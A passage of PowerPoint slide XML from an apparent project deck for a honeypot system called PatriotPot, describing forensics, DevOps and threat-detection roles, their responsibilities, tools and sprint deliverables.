            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2544842"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Event Processing &amp; Analysis components from PatriotPot architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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37" y="1606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437"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Key Responsibilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="2544842"/>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Analyze Cowrie JSON logs (/opt/cowrie/var/log/cowrie.json)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="3108484"/>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Extract and correlate attack patterns from session recordings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="3672126"/>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Perform IP filtering and geographic intelligence analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="4235767"/>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Create attack timeline visualizations and threat actor profiling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="4799409"/>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Document TTPs (Tactics, Techniques, Procedures) using MITRE ATT&amp;CK framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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1203" y="1606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203"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Tools You'll Master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="2544842"/>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CloudWatch Logs for log aggregation and searching</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="2854404"/>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jq for JSON log parsing and analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="3163967"/>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Geographic intelligence tools for attacker origin mapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="3727609"/>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Attack heatmap generation and visualization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>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625108"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="622030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Sprint Deliverables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6563558"/>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Forensics report documenting attack patterns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6873121"/>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Geographic distribution analysis of threat actors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="7182683"/>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MITRE ATT&amp;CK mapping of observed techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>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7437" y="5625108"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="622030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Real-World Skills</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="6563558"/>
            <a:ext cx="42154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Network forensics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="6873121"/>
            <a:ext cx="42154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Threat hunting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="7182683"/>
            <a:ext cx="42154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Incident response</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13328"/>
            <a:ext cx="10716697" cy="460772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>DevOps Engineer - Infrastructure Automation &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="29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668899"/>
            <a:ext cx="368498" cy="368498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2221587"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Primary Focus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2540318"/>
            <a:ext cx="4224814" cy="471488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>System Access &amp; Management, AWS Infrastructure components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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2793" y="1668899"/>
            <a:ext cx="368498" cy="368498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202793" y="2221587"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Key Responsibilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202793" y="2540318"/>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Create Infrastructure as Code templates (Terraform/CloudFormation)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202793" y="3063359"/>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Automate PatriotPot honeypot deployment across multiple regions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202793" y="3586401"/>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Implement CI/CD pipeline for honeypot updates and configuration changes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202793" y="4109442"/>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Manage EC2 instances, VPC configuration, and security groups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202793" y="4632484"/>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Develop deployment automation scripts and monitoring infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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1797" y="1668899"/>
            <a:ext cx="368498" cy="368498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611797" y="2221587"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Tools You'll Master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611797" y="2540318"/>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AWS CLI and Systems Manager for infrastructure management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611797" y="3063359"/>
            <a:ext cx="4224814"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Terraform/CloudFormation for infrastructure as code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611797" y="3350657"/>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Git workflows for version control and deployment automation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9611797" y="3873698"/>
            <a:ext cx="4224814"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AWS IAM for security and access management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>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398770"/>
            <a:ext cx="368498" cy="368498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5951458"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Sprint Deliverables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6270188"/>
            <a:ext cx="4224814"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One-click deployment script for new honeypot instances</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6557486"/>
            <a:ext cx="4224814"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Infrastructure as Code templates for reproducible deployments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="7080528"/>
            <a:ext cx="4224814"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EFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Automated monitoring and alerting configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>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2793" y="5398770"/>
            <a:ext cx="368498" cy="368498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202793" y="5951458"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Real-World Skills</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202793" y="6270188"/>
            <a:ext cx="4224814" cy="471488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Cloud infrastructure, DevOps automation, security architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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792718"/>
            <a:ext cx="9393079" cy="496133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Security Engineer - Threat Detection &amp; Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="31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606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790"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Primary Focus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2544842"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Threat Intelligence &amp; Analysis, Monitoring &amp; Observability components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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37" y="1606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437"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Key Responsibilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="2544842"/>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Implement MITRE ATT&amp;CK mapping for automated threat classification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="3108484"/>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Configure honey credentials and behavioral fingerprinting systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="3672126"/>
            <a:ext cx="42154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Develop threat scoring algorithms and detection rules</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="3981688"/>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Integrate GreyNoise API for real-time threat intelligence enrichment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="4545330"/>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Create Discord webhook alerts and notification systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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1203" y="1606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203"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Tools You'll Master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="2544842"/>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GreyNoise API for IP reputation and threat scoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="2854404"/>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CloudWatch Metrics and Alarms for threat detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="3163967"/>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Discord webhook integration for real-time alerting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="3473529"/>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Behavioral analytics for distinguishing human vs automated attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>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371028"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="59662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Sprint Deliverables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6309479"/>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Threat classification system with automated MITRE mapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
